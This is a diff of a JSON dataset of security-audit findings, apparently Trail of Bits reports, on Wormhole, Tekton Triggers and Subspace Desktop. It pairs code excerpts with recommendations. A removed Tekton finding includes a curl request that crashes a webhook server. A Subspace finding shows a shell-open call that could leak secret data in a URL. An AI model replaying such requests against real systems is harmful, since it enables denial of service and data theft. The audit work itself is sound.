+ "body": "evm.Watcher.Run tries to create an evm watcher, even if called with a ChainID that does not correspond to an evm chain. Additional checks should be added to evm.Watcher.Run to reject such ChainIDs. Approximately 60 watchers are started in node/cmd/guardiand/node.go (figure 10.1). Fifteen of those starts result in calls to evm.Watcher.Run. Given the substantial number of ChainIDs, one can imagine a bug where a developer tries to create an evm watcher with a ChainID that is not for an evm chain. Such a ChainID would be handled by the blanket else in figure 10.2, which tries to create an evm watcher. Such behavior could allow the bug to go unnoticed. To avoid this possibility, evm.Watcher.Run's default behavior should be to fail rather than to create a watcher. if shouldStart(ethRPC) { ... ethWatcher = evm.NewEthWatcher(*ethRPC, ethContractAddr, \"eth\", common.ReadinessEthSyncing, vaa.ChainIDEthereum, chainMsgC[vaa.ChainIDEthereum], setWriteC, chainObsvReqC[vaa.ChainIDEthereum], *unsafeDevMode) ... } if shouldStart(bscRPC) { ... bscWatcher := evm.NewEthWatcher(*bscRPC, bscContractAddr, \"bsc\", common.ReadinessBSCSyncing, vaa.ChainIDBSC, chainMsgC[vaa.ChainIDBSC], nil, chainObsvReqC[vaa.ChainIDBSC], *unsafeDevMode) ... } if shouldStart(polygonRPC) { ... polygonWatcher := evm.NewEthWatcher(*polygonRPC, polygonContractAddr, \"polygon\", common.ReadinessPolygonSyncing, vaa.ChainIDPolygon, chainMsgC[vaa.ChainIDPolygon], nil, chainObsvReqC[vaa.ChainIDPolygon], *unsafeDevMode) } ... Figure 10.1: node/cmd/guardiand/node.go#L1065–L1104 ... } else if w.chainID == vaa.ChainIDOptimism && !w.unsafeDevMode { ... } else if w.chainID == vaa.ChainIDPolygon && w.usePolygonCheckpointing() { ... } else { w.ethConn, err = connectors.NewEthereumConnector(timeout, w.networkName, w.url, w.contract, logger) if err != nil { ethConnectionErrors.WithLabelValues(w.networkName, \"dial_error\").Inc() p2p.DefaultRegistry.AddErrorCount(w.chainID, 1) return fmt.Errorf(\"dialing eth client failed: %w\", err) } } Figure 10.2: node/pkg/watchers/evm/watcher.go#L192–L326 Exploit Scenario Alice, a Wormhole developer, introduces a call to NewEvmWatcher with a ChainID that is not for an evm chain. evm.Watcher.Run accepts the invalid ChainID, and the error goes unnoticed. Recommendations Short term, rewrite evm.Watcher.Run so that a new watcher is created only when a ChainID for an evm chain is passed. When a ChainID for some other chain is passed, evm.Watcher.Run should return an error. Adopting such a strategy will help protect against bugs in node/cmd/guardiand/node.go. Long term: Add tests to the guardiand package to verify that the right watcher is created for each ChainID. This will help ensure the package's correctness. Consider whether TOB-WORMGUWA-9's recommendations should also apply to node/cmd/guardiand/node.go. That is, consider whether the watcher configuration should be handled in node/cmd/guardiand/node.go, as opposed to evm.Watcher.Run. The file node/cmd/guardiand/node.go appears to suffer from similar complexity issues. 
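A minimal sketch of one such strategy, under stated assumptions (the ChainID constants and connector descriptions below are invented for illustration, not Wormhole's actual configuration): a per-chain factory whose default branch fails loudly, addressing both the nested-if complexity flagged in TOB-WORMGUWA-9 and the blanket else flagged here:

```go
package main

import (
	"errors"
	"fmt"
)

// ChainID is a stand-in for vaa.ChainID; the constants are illustrative.
type ChainID uint16

const (
	ChainIDSolana   ChainID = 1 // not an evm chain
	ChainIDEthereum ChainID = 2
	ChainIDBSC      ChainID = 4
	ChainIDPolygon  ChainID = 5
)

var errNotEVM = errors.New("chain ID does not correspond to an evm chain")

// newEVMConnector sketches the recommended shape: one small helper per chain,
// and an explicit error (rather than a blanket else) for unsupported IDs.
func newEVMConnector(id ChainID) (string, error) {
	switch id {
	case ChainIDEthereum:
		return "ethereum connector (finalized blocks)", nil
	case ChainIDBSC:
		return "bsc connector (latest blocks)", nil
	case ChainIDPolygon:
		return "polygon connector (checkpointing)", nil
	default:
		return "", fmt.Errorf("newEVMConnector(%d): %w", id, errNotEVM)
	}
}

func main() {
	if _, err := newEVMConnector(ChainIDSolana); err != nil {
		fmt.Println(err) // the misconfiguration is surfaced instead of hidden
	}
}
```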
It is possible that a single strategy could address the shortcomings of both pieces of code.",
"labels": [
"Trail of Bits",
- "Severity: Medium",
+ "Severity: Informational",
"Difficulty: High"
]
},
{
- "title": "13. Nil dereferences in the trigger interceptor logic ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf",
- "body": "The Process functions, which are responsible for executing the various triggers for the git, gitlab, bitbucket, and cel interceptors, do not properly validate request objects, leading to nil dereference panics when requests are submitted without a Context object. func (w *Interceptor) Process(ctx context.Context, r *triggersv1.InterceptorRequest) *triggersv1.InterceptorResponse { headers := interceptors.Canonical(r.Header) // (...) // Next validate secrets if p.SecretRef != nil { // Check the secret to see if it is empty if p.SecretRef.SecretKey == \"\" { return interceptors.Fail(codes.FailedPrecondition, \"github interceptor secretRef.secretKey is empty\") } // (...) ns, _ := triggersv1.ParseTriggerID(r.Context.TriggerID) Figure 13.1: triggers/pkg/interceptors/github/github.go#L48-L85 We tested the panic by forwarding the Tekton Triggers webhook server to localhost and sending HTTP requests to the GitHub endpoint. The Go HTTP server recovers from the panic. curl -i -s -k -X $'POST' \\ -H $'Host: 127.0.0.1:1934' -H $'Content-Length: 178' \\ --data-binary $'{\\x0d\\x0a\\\"header\\\":{\\x0d\\x0a\\\"X-Hub-Signature\\\":[\\x0d\\x0a\\x09\\\"sig\\\"\\x0d\\x0a],\\x0d\\x0a\\\"X-GitHub-Event\\\":[\\x0d\\x0a\\\"evil\\\"\\x0d\\x0a]\\x0d\\x0a},\\x0d\\x0a\\\"interceptor_params\\\": {\\x0d\\x0a\\x09\\\"secretRef\\\": {\\x0d\\x0a\\x09\\x09\\\"secretKey\\\":\\\"key\\\",\\x0d\\x0a\\x09\\x09\\\"secretName\\\":\\\"name\\\"\\x0d\\x0a\\x09}\\x0d\\x0a}\\x0d\\x0a}' \\ $'http://127.0.0.1:1934/github' Figure 13.2: The curl request that causes a panic 2022/03/08 05:34:13 http: panic serving 127.0.0.1:49304: runtime error: invalid memory address or nil pointer dereference goroutine 33372 [running]: net/http.(*conn).serve.func1(0xc0001bf0e0) net/http/server.go:1824 +0x153 panic(0x1c25340, 0x30d6060) runtime/panic.go:971 +0x499 github.com/tektoncd/triggers/pkg/interceptors/github.(*Interceptor).Process(0xc00000d248, 0x216fec8, 0xc0003d5020, 0xc0002b7b60, 0xc0000a7978) github.com/tektoncd/triggers/pkg/interceptors/github/github.go:85 +0x1f5 github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ExecuteInterceptor(0xc000491490, 0xc000280200, 0x0, 0x0, 0x0, 0x0, 0x0) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:128 +0x5df github.com/tektoncd/triggers/pkg/interceptors/server.(*Server).ServeHTTP(0xc000491490, 0x2166dc0, 0xc0000d42a0, 0xc000280200) github.com/tektoncd/triggers/pkg/interceptors/server/server.go:57 +0x4d net/http.(*ServeMux).ServeHTTP(0xc00042d000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2448 +0x1ad net/http.serverHandler.ServeHTTP(0xc0000d4000, 0x2166dc0, 0xc0000d42a0, 0xc000280200) net/http/server.go:2887 +0xa3 net/http.(*conn).serve(0xc0001bf0e0, 0x216ff00, 0xc00042d200) net/http/server.go:1952 +0x8cd created by net/http.(*Server).Serve net/http/server.go:3013 +0x39b Figure 13.3: Panic trace Exploit Scenario As the codebase continues to grow, a new mechanism is added to call one of the Process functions without relying on HTTP requests (for instance, via a custom RPC client implementation). An attacker uses this mechanism to create a new interceptor. 
He calls the Process function with an invalid object, causing a panic that crashes the Tekton Triggers webhook server. Recommendations Short term, add checks to verify that request Context objects are not nil before dereferencing them. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category",
+ "title": "11. Race condition in TestBlockPoller ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "A race condition causes TestBlockPoller to fail sporadically with the error message in figure 11.1. For a test to be of value, it must be reliable. poller_test.go:300: Error Trace: .../node/pkg/watchers/evm/connectors/poller_test.go:300 Error: Received unexpected error: polling encountered an error: failed to look up latest block: RPC failed Test: TestBlockPoller Figure 11.1: Error produced when TestBlockPoller fails A potential code interleaving causing the above error appears in figure 11.2. The interleaving can be explained as follows: The main thread sets the baseConnector's error and yields (left column). The goroutine declared at poller_test.go:189 retrieves the error, sets the err variable, loops, retrieves the error a second time, and yields (right column). The main thread locks the mutex, verifies that err is set, clears err, and unlocks the mutex (left). The goroutine sets the err variable a second time (right). The main thread locks the mutex and panics because err is set (left). baseConnector.setError(fmt.Errorf(\"RPC failed\")) case thisErr := <-headerSubscription.Err(): mutex.Lock() err = thisErr mutex.Unlock() ... case thisErr := <-headerSubscription.Err(): time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) assert.Error(t, err) assert.Nil(t, block) baseConnector.setError(nil) err = nil mutex.Unlock() // Post the next block and verify we get it (so we survived the RPC error). baseConnector.setBlockNumber(0x309a10) time.Sleep(10 * time.Millisecond) mutex.Lock() require.Equal(t, 1, pollerStatus) require.NoError(t, err) mutex.Lock() err = thisErr mutex.Unlock() Figure 11.2: Interleaving of node/pkg/watchers/evm/connectors/poller_test.go#L283–L300 (left) and node/pkg/watchers/evm/connectors/poller_test.go#L198–L201 (right) that causes an error Exploit Scenario Alice, a Wormhole developer, ignores TestBlockPoller failures because she believes the test to be flaky. In reality, the test is flagging a bug in Alice's code, which she commits to the Wormhole repository. Recommendations Short term: Use different synchronization mechanisms in order to eliminate the race condition described above. This will increase TestBlockPoller's reliability. Have the main thread sleep for random rather than fixed intervals. This will help to expose bugs like this one. Long term, investigate automated tools for finding concurrency bugs in Go programs. This bug is not flagged by Go's race detector. As a result, different analyses are needed.",
"labels": [
"Trail of Bits",
- "Severity: Low",
+ "Severity: Informational",
"Difficulty: Medium"
]
},
{
- "title": "1. Desktop application configuration file stored in group writable file ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf",
- "body": "The desktop application configuration file has group writable permissions, as shown in figure 1.1. 
>>> ls -l $HOME/.config/subspace-desktop/subspace-desktop.cfg -rw-rw-r-- 1 user user 143 $HOME/.config/subspace-desktop/subspace-desktop.cfg Figure 1.1: Permissions of the $HOME/.config/subspace-desktop/subspace-desktop.cfg file This configuration file contains the rewardAddress field (figure 1.2), to which the Subspace farmer sends the farming rewards. Therefore, anyone who can modify this file can control the address that receives farming rewards. For this reason, only the file owner should have the permissions necessary to write to it. { \"plot\" : { \"location\" : \"/.local/share/subspace-desktop/plots\" , \"sizeGB\" : 1 }, \"rewardAddress\" : \"stC2Mgq\" , \"launchOnBoot\" : true , \"version\" : \"0.6.11\" , \"nodeName\" : \"agreeable-toothbrush-4936\" } Figure 1.2: An example of a configuration file Exploit Scenario An attacker controls a Linux user who belongs to the victim's user group. Because every member of the user group is able to write to the victim's configuration file, the attacker is able to change the rewardAddress field of the file to an address she controls. As a result, she starts receiving the victim's farming rewards. Recommendations Short term, change the configuration file's permissions so that only its owner can read and write to it. This will prevent unauthorized users from reading and modifying the file. Additionally, create a centralized function that creates the configuration file; currently, the file is created by code in multiple places in the codebase. Long term, create tests to ensure that the configuration file is created with the correct permissions. 2. Insufficient validation of users' reward addresses Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPDF-2 Target: subspace-desktop/src/pages/ImportKey.vue",
+ "title": "12. Unconventional test structure ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "Tilt is the primary means of testing Wormhole watchers. Relying on such a coarse testing mechanism makes it difficult to know that all necessary conditions and edge cases are tested. The following are some conditions that should be checked by native Go unit tests: The right watcher is created for each ChainID (TOB-WORMGUWA-10). The evm watcher's connectors behave correctly (similar to how the evm finalizers' correct behavior is now tested).2 The evm watcher's logpoller behaves correctly (similar to how the poller's correct behavior is now tested by poller_test.go). There are no off-by-one errors in any inequality involving a block or round number (a minimal boundary test of this kind is sketched after this finding). Examples of such inequalities include the following: node/pkg/watchers/algorand/watcher.go#L225 node/pkg/watchers/algorand/watcher.go#L243 node/pkg/watchers/solana/client.go#L363 node/pkg/watchers/solana/client.go#L841 To be clear, we are not suggesting that the Tilt tests be discarded. However, the Tilt tests should not be the sole means of testing the watchers for any given chain. Exploit Scenario Alice, a Wormhole developer, introduces a bug into the codebase. The bug is not exposed by the Tilt tests. Recommendations Short term, develop unit tests for the watcher code. Get as close to 100% code coverage as possible. Develop specific unit tests for conditions that seem especially problematic. These steps will help ensure the correctness of the watcher code. 2 Note that the evm watcher's finalizers have nearly 100% code coverage by unit tests. 
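As an illustration of the kind of native Go unit test the finding recommends, here is a minimal table-driven boundary test; isFinalized is a hypothetical predicate written for this sketch, not taken from the Wormhole codebase:

```go
package watcher_test

import "testing"

// isFinalized is a hypothetical predicate of the kind audited in the watcher
// code: block numbers at or below the finalized height are considered final.
func isFinalized(block, finalizedHeight uint64) bool {
	return block <= finalizedHeight
}

// TestIsFinalizedBoundary pins down the boundary case, the usual home of
// off-by-one errors in inequalities over block or round numbers.
func TestIsFinalizedBoundary(t *testing.T) {
	tests := []struct {
		block, height uint64
		want          bool
	}{
		{99, 100, true},   // strictly below the finalized height: final
		{100, 100, true},  // equal: final (the easy case to get wrong)
		{101, 100, false}, // strictly above: not final
	}
	for _, tt := range tests {
		if got := isFinalized(tt.block, tt.height); got != tt.want {
			t.Errorf("isFinalized(%d, %d) = %v, want %v", tt.block, tt.height, got, tt.want)
		}
	}
}
```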
Long term, regularly review test coverage to help identify gaps in the tests as the code evolves.",
"labels": [
"Trail of Bits",
"Severity: Informational",
@@ -2202,19 +4970,19 @@
]
},
{
- "title": "3. Improper error handling ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf",
- "body": "The front end code handles errors incorrectly in the following cases: The Linux auto launcher function createAutostartDir does not return an error if it fails to create the autostart directory. The Linux auto launcher function enable does not return an error if it fails to create the autostart file. The Linux auto launcher function disable does not return an error if it fails to remove the autostart file. The Linux auto launcher function isEnabled always returns true, even if it fails to read the autostart file, which indicates that the auto launcher is disabled. The exportLogs function does not display error messages to users when errors occur. Instead, it silently fails. If rewardAddress is not set, the startFarming function sends an error log to the back end but not to the front end. Despite the error, the function still tries to start farming without a reward address, causing the back end to error out. Without an error message displayed in the front end, the source of the failure is unclear. The Config::init function does not show users an error message if it fails to create the configuration directory. The Config::write function does not show users an error message if it fails to create the configuration directory, and it proceeds to try to write to the nonexistent configuration file. Additionally, it does not show an error message if it fails to write to the configuration file in its call to writeFile. The removePlot function does not return an error if it fails to delete the plots directory. The createPlotDir function does not return an error if it fails to create the plots folder (e.g., if the given user does not have the permissions necessary to create the folder in that directory). This will cause the startPlotting function to fail silently; without an error message, the user cannot know the source of the failure. The createAutostartDir function logs an error unnecessarily. The function determines whether a directory exists by calling the readDir function; however, even though occasionally the directory may not be found (as expected), the function always logs an error if it is not found. Exploit Scenario To store his plots, a user chooses a directory that he does not have the permissions necessary to write to. The program fails but does not display a clear error message with the reason for the failure. The user cannot understand the problem, becomes frustrated, and deletes the application. Recommendations Short term, modify the code in the locations described above to handle errors consistently and to display messages with clear reasons for the errors in the UI. This will make the code more reliable and reduce the likelihood that users will face obstacles when using the Subspace Desktop application. Long term, write tests that trigger all possible error conditions and check that all errors are handled gracefully and are accompanied by error messages displayed to the user where relevant. This will prevent regressions during the development process.",
+ "title": "13. 
Vulnerable Go packages ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "govulncheck reports that the packages used by Wormhole in table 13.1 have known vulnerabilities, which are described in the following table. Package Vulnerability",
"labels": [
"Trail of Bits",
"Severity: Undetermined",
"Difficulty: Undetermined"
]
},
{
- "title": "4. Flawed regex in the Tauri configuration ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf",
- "body": "The Tauri configuration that limits which files the front end can open with the system's default applications is flawed. As shown in figure 4.1, the configuration file uses the [/subspace\\\\-desktop/] regex; the Subspace developers intended this regex to match file names that include the /subspace-desktop/ string, but the regex actually matches any string that has a single character inside the regex's square brackets. \"shell\" : { \"all\" : true , \"execute\" : true , \"open\" : \"[/subspace\\\\-desktop/]\" , \"scope\" : [ { \"name\" : \"run-osascript\" , \"cmd\" : \"osascript\" , \"args\" : true } ] }, Figure 4.1: subspace-desktop/src-tauri/tauri.conf.json#L81-L92 For example, tauri.shell.open(\"s\") is accepted as a valid location because s is inside the regex's square brackets. Contrarily, tauri.shell.open(\"z\") is an invalid location because z is not inside the square brackets. Besides opening files, in Linux, the tauri.shell.open function will handle anything that the xdg-open command handles. For example, tauri.shell.open(\"apt://firefox\") shows users a prompt to install Firefox. Attackers could also use the tauri.shell.open function to make arbitrary HTTP requests and bypass the CSP's connect-src directive with calls such as tauri.shell.open(\"https:///?secret_data=\"). Exploit Scenario An attacker finds a cross-site scripting (XSS) vulnerability in the Subspace Desktop front end. He uses the XSS vulnerability to open an arbitrary URL protocol with the exploit described above and gains the ability to remotely execute code on the user's machine. For examples of how common URL protocol handlers can lead to remote code execution attacks, refer to the vulnerabilities in the Steam and Visual Studio Code URL protocols. Recommendations Short term, revise the regex so that the front end can open only file: URLs that are within the Subspace Desktop application's logs folder. Alternatively, have the Rust back end serve these files and disallow the front end from accessing any files (see issue TOB-SPDF-5 for a more complete architectural recommendation). Long term, write positive and negative tests that check the developers' assumptions related to the Tauri configuration. 5. Insufficient privilege separation between the front end and back end Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-SPDF-5 Target: The Subspace Desktop architecture",
+ "title": "14. Wormhole node does not build with latest Go version ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "Attempting to build a Wormhole node with the latest Go version (1.20.1) produces the error in figure 14.1. Go's release policy states, \"Each major Go release is supported until there are two newer major releases.\" By not building with the latest Go version, Wormhole's ability to receive updates will expire. 
cannot use \"The version of quic-go you're using can't be built on Go 1.20 yet. For more details, please see https://github.com/lucas-clemente/quic-go/wiki/quic-go-and-Go-versions.\" (untyped string constant \"The version of quic-go you're using can't be built on Go 1.20 yet. F...) as int value in variable declaration Figure 14.1: Error produced when one tries to build the Wormhole with the latest Go version (1.20) It is unclear when Go 1.21 will be released. Go 1.20 was released on February 1, 2023 (a few days prior to the start of the audit), and new versions appear to be released about every six months. We found a thread discussing Go 1.21, but it does not mention dates. Exploit Scenario Alice attempts to build a Wormhole node with Go version 1.20. When her attempt fails, Alice switches to Go version 1.19. Go 1.21 is released, and Go 1.19 ceases to receive updates. A vulnerability is found in a Go 1.19 package, and Alice is left vulnerable. Recommendations Short term, adapt the code so that it builds with Go version 1.20. This will allow Wormhole to receive updates for a greater period of time than if it builds only with Go version 1.19. Long term, test with the latest Go version in CI. This will help identify incompatibilities like this one sooner. References Go Release History (see Release Policy) Planning Go 1.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2222,9 +4990,9 @@ ] }, { - "title": "6. Vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf", - "body": "The Subspace Desktop Tauri application uses vulnerable Rust and Node dependencies, as reported by the cargo audit and yarn audit tools. Among the Rust crates used in the Tauri application, two are vulnerable, three are unmaintained, and six are yanked. The table below summarizes the ndings: Crate Version in Use Finding Latest Safe Version owning_ref 0.4.1 Memory corruption vulnerability ( RUSTSEC-2022-0040 ) Not available time 0.1.43 Memory corruption vulnerability ( RUSTSEC-2020-0071 ) 0.2.23 and newer ansi_term 0.12.1 dotenv 0.15.0 xml-rs 0.8.4 Unmaintained crate ( RUSTSEC-2021-0139 ) Unmaintained crate ( RUSTSEC-2021-0141 ) Unmaintained crate ( RUSTSEC-2022-0048 ) blake2 0.10.2 Yanked crate block-buffer 0.10.0 Yanked crate cpufeatures 0.2.1 Yanked crate iana-time-zone 0.1.44 Yanked crate Multiple alternatives dotenvy quick-xml 0.10.4 0.10.3 0.2.5 0.1.50 sp-version 5.0. For the Node dependencies used in the Tauri application, one is vulnerable to a high-severity issue and another is vulnerable to a moderate-severity issue. These vulnerable dependencies appear to be used only in the development dependencies. Package Finding Latest Safe Version got CVE-2022-33987 (Moderate severity) 11.8.5 and newer git-clone CVE-2022-25900 (High severity) Not available Exploit Scenario An attacker nds a way to exploit a known memory corruption vulnerability in one of the dependencies reported above and takes control of the application. Recommendations Short term, update the dependencies to their newest possible versions. Work with the library authors to update the indirect dependencies. Monitor the development of the x for owning_ref and upgrade it as soon as a safe version of the crate becomes available. Long term, run cargo audit and yarn audit regularly. 
Include cargo audit and yarn audit in the project's CI/CD pipeline to ensure that the team is aware of new vulnerabilities in the dependencies.",
+ "title": "15. Missing or wrong context ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "In several places where a Context is required, the Wormhole node creates a new background Context rather than using the passed-in Context. If the passed-in Context is canceled or times out, a goroutine using the background Context will not detect this, and resources will be leaked. The aforementioned problem is flagged by the contextcheck lint. For each of the locations named in figure 15.1, a Context is passed in to the enclosing function, but the passed-in Context is not used. Rather, a new background Context is created. algorand/watcher.go:172:51: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) status, err := algodClient.StatusAfterBlock(0).Do(context.Background()) ^ algorand/watcher.go:196:139: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) result, err := indexerClient.SearchForTransactions().TXID(base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(r.TxHash)).Do(context.Background()) ^ algorand/watcher.go:205:42: Non-inherited new context, use function like `context.WithXXX` instead (contextcheck) block, err := algodClient.Block(r).Do(context.Background()) ^ Figure 15.1: Warnings produced by contextcheck A closely related problem is flagged by the noctx lint. In each of the locations named in figure 15.2, http.Get or http.Post is used. These functions do not take a Context argument. As such, if the Context passed in to the enclosing function is canceled, the Get or Post will not similarly be canceled. cosmwasm/watcher.go:198:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/%s\", e.urlLCD, e.latestBlockURL)) ^ cosmwasm/watcher.go:246:28: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/cosmos/tx/v1beta1/txs/%s\", e.urlLCD, tx)) ^ sui/watcher.go:315:26: net/http.Post must not be called (noctx) resp, err := http.Post(e.suiRPC, \"application/json\", strings.NewReader(buf)) ^ sui/watcher.go:378:26: net/http.Post must not be called (noctx) resp, err := http.Post(e.suiRPC, \"application/json\", strings.NewReader(`{\"jsonrpc\":\"2.0\", \"id\": 1, \"method\": \"sui_getCommitteeInfo\", \"params\": []}`)) ^ wormchain/watcher.go:136:27: (*net/http.Client).Get must not be called (noctx) resp, err := client.Get(fmt.Sprintf(\"%s/blocks/latest\", e.urlLCD)) ^ Figure 15.2: Warnings produced by noctx Exploit Scenario A bug causes Alice's Algorand, Cosmwasm, Sui, or Wormchain node to hang. The bug triggers repeatedly. The connections from Alice's Wormhole node to the respective blockchain nodes hang, causing unnecessary resource consumption. Recommendations Short term, take the following steps: For each location named in figure 15.1, use the passed-in Context rather than creating a new background Context. For each location named in figure 15.2, rewrite the code to use http.Client.Do. Taking these steps will help to prevent unnecessary resource consumption and potential denial of service. Long term, enable the contextcheck and noctx lints in CI. The problems highlighted in this finding were uncovered by those lints. Running them regularly could help to identify similar problems. 
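A minimal sketch of the recommended rewrite, under stated assumptions (http.NewRequestWithContext and http.Client.Do are real standard-library APIs; fetchLatestBlock and the endpoint are illustrative, not the actual watcher code):

```go
package main

import (
	"context"
	"fmt"
	"io"
	"net/http"
	"time"
)

// fetchLatestBlock derives the request from the caller's ctx via
// http.NewRequestWithContext and sends it with client.Do, so canceling
// ctx also cancels the in-flight HTTP request (unlike client.Get).
func fetchLatestBlock(ctx context.Context, client *http.Client, urlLCD string) ([]byte, error) {
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, urlLCD+"/blocks/latest", nil)
	if err != nil {
		return nil, err
	}
	resp, err := client.Do(req) // honors ctx cancellation and timeouts
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	return io.ReadAll(resp.Body)
}

func main() {
	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
	defer cancel()
	if _, err := fetchLatestBlock(ctx, http.DefaultClient, "http://localhost:1317"); err != nil {
		fmt.Println("request ended with:", err) // times out instead of hanging
	}
}
```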
References contextcheck noctx",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: High"
]
},
{
- "title": "7. Broken error reporting link ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf",
- "body": "The create_full_client function calls the sp_panic_handler::set() function to set a URL for a Discord invitation; however, this invitation is broken. The documentation for the sp_panic_handler::set() function states that \"The bug_url parameter is an invitation for users to visit that URL to submit a bug report in the case where a panic happens.\" Because the link is broken, users cannot submit bug reports. sp_panic_handler::set( \"https://discord.gg/vhKF9w3x\", env!(\"SUBSTRATE_CLI_IMPL_VERSION\"), ); Figure 7.1: subspace-desktop/src-tauri/src/node.rs#L169-L172 Exploit Scenario A user encounters a crash of Subspace Desktop and is presented with a broken link with which to report the error. The user is unable to report the error. Recommendations Short term, update the bug report link to the correct Discord invitation. Long term, use a URL on a domain controlled by Subspace Network as the bug reporting URL. This will allow Subspace Network developers to make adjustments to the reporting URL without pushing application updates. 8. Side effects are triggered regardless of disk_farms validity Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SPDF-8 Target: src-tauri/src/farmer.rs#L118-L192",
+ "title": "16. Use of defer in a loop ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "The Solana watcher uses defer within an infinite loop (figure 16.1). Deferred calls are executed when their enclosing function returns. Since the enclosing loop is not exited under normal circumstances, the deferred calls are never executed and constitute a waste of resources. for { select { case <-ctx.Done(): return nil default: rCtx, cancel := context.WithTimeout(ctx, time.Second*300) // 5 minute defer cancel() ... } } Figure 16.1: node/pkg/watchers/solana/client.go#L244–L271 Sample code demonstrating the problem appears in appendix E. Exploit Scenario Alice runs her Wormhole node in an environment with constrained resources. Alice finds that her node is not able to achieve the same uptime as other Wormhole nodes. The underlying cause is resource exhaustion caused by the Solana watcher. Recommendations Short term, rewrite the code in figure 16.1 to eliminate the use of defer in the for loop. The easiest and most straightforward way would likely be to move the code in the default case into its own named function. Eliminating this use of defer in a loop will eliminate a potential source of resource exhaustion. Long term, regularly review uses of defer to ensure they do not appear in a loop. To the best of our knowledge, there are not publicly available detectors for problems like this. However, regular manual review should be sufficient to spot them.",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: Low"
]
},
{
- "title": "9. 
Network configuration path construction is duplicated ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-subspacenetwork-subspacenetworkdesktopfarmer-securityreview.pdf",
- "body": "The create_full_client function contains code that uses hard-coded strings to indicate configuration paths (figure 9.1) in place of the previously defined DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values, which are used in the other parts of the code. This is a risky coding pattern, as a Subspace developer who is updating the DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE values may forget to also update the equivalent values used in the create_full_client function. if primary_chain_node.client.info().best_number == 33670 { if let Some(config_dir) = config_dir { let workaround_file = config_dir.join(\"network\").join(\"gemini_1b_workaround\"); if !workaround_file.exists() { let _ = std::fs::write(workaround_file, &[]); let _ = std::fs::remove_file( config_dir.join(\"network\").join(\"secret_ed25519\") ); return Err(anyhow!( \"Applied workaround for upgrade from gemini-1b-2022-jun-08, \\ please restart this node\" )); } } } Figure 9.1: subspace-desktop/src-tauri/src/node.rs#L207-L219 Recommendations Short term, update the code in figure 9.1 to use DEFAULT_NETWORK_CONFIG_PATH and NODE_KEY_ED25519_FILE rather than the hard-coded values. This will make eventual updates to these paths less error prone.",
+ "title": "17. Finalizer is allowed to be nil ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf",
+ "body": "The configuration of a chain's watcher can allow a finalizer to be nil, which may allow newly introduced bugs to go unnoticed. Whenever a chain's RPC does not have a notion of safe or finalized blocks, the watcher polls the chain for the latest block using BlockPollConnector. After fetching a block, the watcher checks whether it is final in accordance with the respective chain's PollFinalizer implementation. // BlockPollConnector polls for new blocks instead of subscribing when using SubscribeForBlocks. It allows to specify a // finalizer which will be used to only return finalized blocks on subscriptions. type BlockPollConnector struct { Connector Delay time.Duration useFinalized bool publishSafeBlocks bool finalizer PollFinalizer blockFeed ethEvent.Feed errFeed ethEvent.Feed } Figure 17.1: node/pkg/watchers/evm/connectors/poller.go#L24–L34 However, the method pollBlocks allows BlockPollConnector to have a nil PollFinalizer (see figure 17.2). This is unnecessary and may permit edge cases that could otherwise be avoided by requiring all BlockPollConnectors to use the DefaultFinalizer explicitly if a finalizer is not required (the default finalizer accepts all blocks as final). This will ensure that the watcher does not incidentally process a block received from blockFeed that is not in the canonical chain. if b.finalizer != nil { finalized, err := b.finalizer.IsBlockFinalized(timeout, block) if err != nil { logger.Error(\"failed to check block finalization\", zap.Uint64(\"block\", block.Number.Uint64()), zap.Error(err)) return lastPublishedBlock, fmt.Errorf(\"failed to check block finalization (%d): %w\", block.Number.Uint64(), err) } if !finalized { break } } b.blockFeed.Send(block) lastPublishedBlock = block Figure 17.2: 